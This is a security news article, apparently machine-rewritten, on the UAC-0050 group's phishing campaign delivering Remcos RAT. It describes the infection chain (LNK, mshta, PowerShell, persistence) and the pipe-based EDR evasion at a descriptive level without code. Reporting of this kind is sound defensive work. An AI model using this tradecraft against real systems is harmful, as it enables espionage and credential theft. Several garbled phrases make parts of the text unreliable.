A threat actor named UAC-0050 is leveraging phishing attacks to distribute Remcos RAT using new tactics to evade detection by security software.
“The group’s weapon of choice is Remcos RAT, a notorious remote surveillance and control malware that has long been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a report on Wednesday. Forefront.”
“However, in the latest operational changes, the UAC-0050 group has integrated a pipeline approach for inter-process communication, demonstrating its advanced adaptability.”
UAC-0050 has been active since 2020 and has historically targeted entities in Ukraine and Poland through social engineering campaigns, impersonating legitimate organizations to trick recipients into opening malicious attachments.
In February 2023, Ukraine’s Computer Emergency Response Team (CERT-UA) blamed attackers on a phishing campaign designed to spread the Remcos RAT.
The same Trojan has been distributed as part of at least three different phishing waves over the past few months, with one such attack also resulting in the deployment of an information-stealing program called Meduza Stealer.
Uptycs’ analysis is based on LNK files it discovered on December 21, 2023. While the exact initial access vector is not yet known, it is suspected to involve phishing emails targeting Ukrainian military personnel claiming to have advisory roles within the Israel Defense Forces (Israel Defense Forces).
The associated LNK file collects information about the antivirus products installed on the target computer and then uses mshta.exe (a Windows native binary file used to run HTA files) to retrieve and execute a file named “6.hta” from the remote server. HTML application.
This step paves the way for the PowerShell script to unzip another PowerShell script to download two files named “word_update.exe” and “ofer.docx” from the new-tech-savvy domain[.]com.
Executing word_update.exe causes it to create a copy of itself named fmTask_dbg.exe and establish persistence by creating a shortcut to a new executable file in the Windows Startup folder.
This binary also uses unnamed pipes to facilitate the exchange of data between itself and the newly spawned cmd.exe child process in order to eventually decrypt and launch the Remcos RAT (version 4.9.2 Pro), which can collect system data and data from Cookies and login information for web browsers such as Internet Explorer, Mozilla Firefox and Google Chrome.
“Utilizing pipes within the Windows operating system provides a covert channel for data transmission, cleverly evading detection by endpoint detection and response (EDR) and anti-virus systems,” the researchers said.
“While not entirely new, this technology marks a significant leap in the organization’s strategic sophistication.”
